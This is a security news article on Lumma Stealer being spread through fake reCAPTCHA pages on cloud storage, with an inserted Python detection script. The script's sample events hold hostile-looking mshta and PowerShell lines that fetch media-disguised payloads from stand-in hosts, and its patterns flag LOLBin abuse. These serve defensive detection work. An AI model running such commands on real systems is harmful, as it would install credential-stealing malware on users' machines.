Cybercriminals Exploit Cloud Platforms to Spread Lumma Stealer Malware


A New Breed of Threat: Malware Delivered via Trusted Cloud Services

Cybercriminals are turning to mainstream cloud infrastructure platforms to carry out stealthy and highly sophisticated malware attacks, bypassing traditional detection mechanisms and exploiting user trust in big tech. The Lumma Stealer (also known as LummaC2 Stealer), a potent malware-as-a-service, is being distributed through legitimate cloud services like Oracle Cloud Infrastructure (OCI) and Scaleway Object Storage. This marks a worrying evolution in cybercrime strategy, targeting enterprise systems through deceptive human verification pages and clipboard-injected PowerShell commands.

How It Works: An In-Depth Overview of the Attack Chain

In early 2025, cybersecurity researchers uncovered a disturbing new tactic by Russian-speaking threat actors: the use of reputable cloud platforms to host malicious content and distribute malware. The attackers crafted fake reCAPTCHA pages hosted on services such as Tigris Object Storage, OCI, and Scaleway. These pages mimic legitimate verification processes and trick users—typically those with elevated system privileges—into copying and pasting dangerous PowerShell commands into their system’s “Run” dialog.

Once executed, these commands trigger scripts that utilize “Living Off the Land” binaries (LOLBins), especially mshta.exe, to fetch a disguised payload from attacker-controlled servers. Often appearing as .mp4 or .ogg media files, the payload is actually Lumma Stealer: a sophisticated infostealer capable of siphoning login credentials, cryptocurrency wallets, and system metadata. It also supports modular payloads for further exploitation.

Analysis of the malicious code uncovered consistent Russian-language comments, such as “Main container” and “Obfuscated code with garbage decoy functions,” which hint at a coordinated operation by Russian-speaking cybercriminals. While there is no confirmed state affiliation, the structure and execution suggest a well-organized network with advanced development capabilities.

The choice of cloud services is strategic. These platforms are trusted by developers and businesses, and their use allows attackers to bypass automated defenses and blacklists. Moreover, by forcing manual user interaction—copy-pasting commands instead of auto-clicks—attackers successfully evade many behavioral detection systems.
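The attack chain described above leaves a recognisable trace in endpoint telemetry: a LOLBin such as mshta.exe started from explorer.exe (the parent of anything typed into the Run dialog) with a remote URL whose path ends in a media extension. The following Python is an added example, not code from the article or from any vendor named in it; the event fields, hostnames and user names are constructed for illustration.

```python
import re

# Constructed process-creation events (Sysmon Event ID 1 style fields); not real telemetry.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\mshta.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "mshta.exe https://objstore.example.invalid/cdn/clip.mp4",
     "User": "CORP\\admin.jdoe"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": 'powershell.exe -c "mshta https://bucket.example.invalid/verify.ogg"',
     "User": "CORP\\admin.jdoe"},
    # Benign: a local .hta run by an installer, no network fetch, not user-typed.
    {"Image": r"C:\Windows\System32\mshta.exe", "ParentImage": r"C:\Program Files\App\installer.exe",
     "CommandLine": r"mshta.exe C:\Program Files\App\setup.hta", "User": "CORP\\svc.build"},
    # Benign: interactive PowerShell with no LOLBin chaining and no remote URL.
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell.exe Get-ChildItem C:\\Users", "User": "CORP\\jdoe"},
]

LOLBINS = {"mshta.exe", "powershell.exe"}
REMOTE_URL = re.compile(r"https?://\S+", re.IGNORECASE)
# Extensions the campaign used to disguise the payload, plus a few common media types.
MEDIA_EXT = re.compile(r"\.(mp4|ogg|mp3|wav|avi)(\W|$)", re.IGNORECASE)

def score_event(ev):
    """Return the list of indicators present in one event (empty list if none)."""
    reasons = []
    image = ev["Image"].rsplit("\\", 1)[-1].lower()
    cmd = ev["CommandLine"]
    if image in LOLBINS and "mshta" in cmd.lower():
        reasons.append("mshta invoked")
    urls = REMOTE_URL.findall(cmd)
    if urls:
        reasons.append("remote URL on command line")
        if any(MEDIA_EXT.search(u) for u in urls):
            reasons.append("payload disguised with media extension")
    if ev["ParentImage"].lower().endswith("\\explorer.exe"):
        reasons.append("launched from explorer.exe (Run dialog / manual paste)")
    return reasons

def detect(events):
    """Alert only on the full chain, so a lone indicator (e.g. a local .hta) stays quiet."""
    hits = []
    for ev in events:
        reasons = score_event(ev)
        if "mshta invoked" in reasons and "remote URL on command line" in reasons and len(reasons) >= 3:
            hits.append({"User": ev["User"], "CommandLine": ev["CommandLine"], "Reasons": reasons})
    return hits
```

Running `detect(SAMPLE_EVENTS)` flags the two events for the privileged user and leaves both benign events alone; in production the same logic would read from the SIEM rather than an inline list.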

In response to public reports, platforms like Scaleway and Tigris quickly removed the malicious files and initiated stronger anti-abuse actions. Oracle, however, has not yet issued an official statement. Meanwhile, cybersecurity firms like Cato Networks have started blocking known redirection paths and have deployed intrusion detection signatures targeting this specific tactic.

The incident is a stark reminder of how trust in cloud platforms can be weaponized and highlights the need for continuous adaptation in cybersecurity strategies. Enterprises are being urged to train staff, monitor cloud storage behavior, and collaborate with providers to detect and dismantle malicious infrastructure.

What Undercode Says:

The exploitation of cloud platforms in delivering malware such as Lumma Stealer signals a dangerous shift in cyberattack paradigms. Threat actors are no longer limited to shady websites or questionable attachments. They’re now leveraging legitimate, trusted cloud environments to slip past defenses with ease.

By abusing services like Oracle Cloud and Scaleway, attackers are taking advantage of platforms that are often considered “safe zones.” Security protocols tend to be less aggressive here to avoid interrupting legitimate developer workflows, making these platforms perfect for low-detection malware hosting.

The decision to target high-privilege users adds another layer of danger. These users often hold administrative rights, meaning once compromised, attackers can move laterally across networks, exfiltrating data or escalating attacks. This kind of breach isn’t just a leak—it’s an organizational implosion waiting to happen.

Lumma Stealer’s use of LOLBins demonstrates an expert understanding of system internals. Tools like mshta.exe are part of Windows and can run scripts without raising flags. This “Living Off the Land” tactic makes the malware harder to detect and even harder to block with traditional antivirus software.

The Russian language annotations in the code may not be smoking guns for state involvement, but they’re important context. They show not only the likely geographical origin of the malware but also a deliberate effort to mislead analysts through obfuscation and junk code.

One of the most concerning elements here is the social engineering angle. The malware delivery hinges on users trusting a CAPTCHA interface and following copy-paste instructions—something that even savvy users might do in a moment of distraction. It’s a chilling reminder that even educated, security-aware professionals can be manipulated under the right conditions.

The cleanup responses from platforms like Tigris and Scaleway are commendable, but the silence from Oracle raises concerns about transparency and accountability. Tech giants need to take a more proactive stance in monitoring and managing abuse of their services.

This campaign also underscores the need for improved user education. Employees should be trained not just on phishing emails but on subtler tricks like clipboard-based command injection. Security culture must evolve to keep pace with criminal creativity.

From a defense standpoint, it’s vital to shift toward behavior-based detection, not just signature-based. MDR (Managed Detection and Response) services, threat intelligence sharing, and real-time analytics must become the norm. Static defenses are no longer sufficient in a dynamic, cloud-integrated threat landscape.

Organizations should also implement strict application whitelisting and enforce least-privilege principles. This way, even if malware is executed, its impact is minimized.

In the future, expect to see more of this cloud abuse strategy. It’s cost-effective for attackers, difficult to detect, and highly scalable. Only through cross-sector collaboration and cloud-provider vigilance can we hope to contain this emerging threat.

Fact Checker Results ✅

Verified abuse of cloud services including OCI and Scaleway
Confirmed distribution of Lumma Stealer via fake reCAPTCHA pages
Russian-language code annotations consistently observed in analyzed samples 🕵️‍♂️

Prediction 🔮

Given the success of this campaign, more threat actors will likely follow suit, using cloud platforms for malware hosting due to the inherent trust and flexibility these services offer. Expect further innovations in social engineering combined with evasive scripting, especially targeting privileged enterprise accounts. Cloud service providers will face increasing pressure to strengthen content monitoring and automate abuse detection systems.

References:

Reported By: cyberpress.org